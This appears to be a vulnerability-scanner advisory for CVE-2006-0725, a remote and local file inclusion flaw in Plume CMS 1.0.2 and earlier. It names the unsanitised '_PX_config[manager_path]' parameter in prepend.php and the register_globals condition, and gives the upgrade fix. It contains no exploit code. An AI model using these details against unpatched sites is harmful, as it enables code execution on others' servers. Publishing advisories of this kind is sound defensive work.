Plume CMS <= 1.0.2 Remote File Inclusion Vulnerability Network Vulnerability

Summary

The remote host is running a PHP application that is prone to local and remote file inclusion attacks. Description : The system is running Plume CMS a simple but powerful content management system. The version installed does not sanitize user input in the '_PX_config[manager_path]' parameter in the 'prepend.php' file. This allows an attacker to include arbitrary files and execute code on the system. This flaw is exploitable if PHP's register_globals is enabled.

Solution

Either sanitize the prepend.php file as advised by the developer (see first URL) or upgrade to Plume CMS version 1.0.3 or later

References

http://secunia.com/advisories/18883/

Updated on 2017-03-28

Severity

Classification

CVE CVE-2006-0725

CVSS	Base Score: 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P

Related Vulnerabilities

Apache Archiva Cross Site Request Forgery Vulnerability
AeroMail Cross Site Request Forgery, HTML Injection and Cross Site Scripting Vulnerabilities
A4Desk Event Calendar 'eventid' Parameter SQL Injection Vulnerability
Apache Tomcat TroubleShooter Servlet Installed
Adobe ColdFusion HTTP Response Splitting Vulnerability

Take action and discover your vulnerabilities